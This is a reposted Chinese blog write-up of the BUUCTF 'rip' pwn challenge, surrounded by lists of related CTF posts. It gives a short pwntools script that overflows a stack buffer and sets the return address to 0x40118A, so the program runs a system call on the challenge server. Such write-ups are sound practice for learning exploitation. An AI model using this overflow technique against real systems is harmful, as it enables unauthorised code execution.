BUUCTF(Pwn) rip

其他 2021-03-26 11:44:43 阅读次数: 0

在这里插入图片描述
按tab键,看一下 fun函数发现其地址是 0x401186;
但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行

from pwn import *

p = remote('node3.buuoj.cn', '25677') 

payload = 'a' * (0xf + 8) + p64(0x40118A)

p.sendline(payload)

p.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_45556441/article/details/115025934

【BUUCTF - PWN】rip

BUUCTF(Pwn) rip

CTF学习日记----buuctf pwn rip

【BUUCTF - PWN】PWN5

RIP

【BUUCTF - PWN】babyrop

buuctf-pwn babyrop

buuctf pwn （17~20）

buuctf pwn（13~16）

buuctf pwn（5~8）

buuctf pwn（9~12）

buuctf pwn（1~4）

buuctf pwn （21~24）

【BUUCTF - PWN】pwn1_sctf_2016

[BUUCTF]PWN——suctf_2018_basic pwn

BUUCTF PWN部分题目wp

buuctf --pwn part2

【BUUCTF - PWN】baby_rop

BUUCTF-PWN-cmcc_simplerop

[BUUCTF]PWN——jarvisoj_fm

pwn BUUCTF第五空间决赛pwn5

[BUUCTF-pwn]——pwn1_sctf_2016

[BUUCTF]PWN——[第五空间2019 决赛]PWN5

buuctf pwn wp---part1

buuctf@pwn1_sctf_2016

【BUUCTF - PWN】jarvisoj_level2

【BUUCTF - PWN】jarvisoj_level0

【BUUCTF - PWN】babyheap_0ctf_2017

【BUUCTF - PWN】not_the_same_3dsctf_2016

【BUUCTF - PWN】warmup_csaw_2016

今日推荐

周排行

教你如何约女孩子的方式去理解（TCP三次握手与四次挥手）

android按压背景

【量化小讲堂-Python&Pandas系列10】如何判断一个策略的好坏？(附代码)

编程题：利用链表实现栈

盘点47条 Allegro 使用技巧，你都知道吗？

在VMware Workstation中安装CentOS

二叉树的实现

cmake安装jsoncpp

ReactNative开发城市列表页

最全前端学习资源

每日归档

2025-03-20(0)

2025-03-19(0)

2025-03-18(0)

2025-03-17(0)

2025-03-16(0)

2025-03-15(0)

2025-03-14(0)

2025-03-13(0)

2025-03-12(0)

2025-03-11(0)